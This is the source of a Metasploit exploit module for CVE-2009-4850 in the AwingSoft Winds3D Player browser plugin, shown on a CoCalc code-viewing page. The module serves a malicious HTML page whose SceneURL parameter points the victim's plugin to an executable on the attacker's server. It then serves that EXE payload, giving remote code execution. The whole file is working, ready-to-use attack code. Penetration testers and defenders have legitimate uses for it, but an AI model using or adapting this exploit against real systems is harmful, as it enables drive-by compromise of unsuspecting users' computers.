CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'AwingSoft Winds3D Player 3.5 SceneURL Download and Execute',

15
      'Description'    => %q{

16
          This module exploits an untrusted program execution vulnerability within the

17
        Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for

18
        IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL'

19
        parameter to the URL to an executable, an attacker can execute arbitrary

20
        code.

21


22
        Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and

23
        IE 8 on Windows XP SP3.

24
      },

25
      'License'        => MSF_LICENSE,

26
      'Author'         =>

27
        [

28
          'jduck'  # original discovery & metasploit module

29
        ],

30
      'References'     =>

31
        [

32
          [ 'CVE', '2009-4850' ],

33
          [ 'OSVDB', '60049' ]

34
        ],

35
      'Payload'        =>

36
        {

37
          'Space'    => 2048,

38
          'StackAdjustment' => -3500,

39
        },

40
      'Platform'       => 'win',

41
      'Targets'        =>

42
        [

43
          [ 'Automatic', { }],

44
        ],

45
      'DisclosureDate' => '2009-11-14',

46
      'DefaultTarget'  => 0))

47
  end

48


49
  def on_request_uri(cli, request)

50


51
    payload_url =  "http://"

52
    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']

53
    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"

54


55
    if (request.uri.match(/payload/))

56
      return if ((p = regenerate_payload(cli)) == nil)

57
      data = generate_payload_exe({ :code => p.encoded })

58
      print_status("Sending EXE payload")

59
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })

60


61
      # Handle the payload

62
      # handler(cli)

63
      return

64
    end

65


66
    # otherwise, send the html..

67
    html = %Q|<html>

68
<body>

69
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903'

70
codebase='http://www.awingsoft.com/zips/WindsPly.CAB'>

71
<param name="SceneURL" value="#{payload_url}#">

72
<embed type="application/x-awingsoft-winds3d" src="#{payload_url}">

73
</object>

74
|

75


76
    print_status("Sending #{self.name} HTML")

77
    # Transmit the compressed response to the client

78
    send_response(cli, html, { 'Content-Type' => 'text/html' })

79


80
  end

81
end

82


83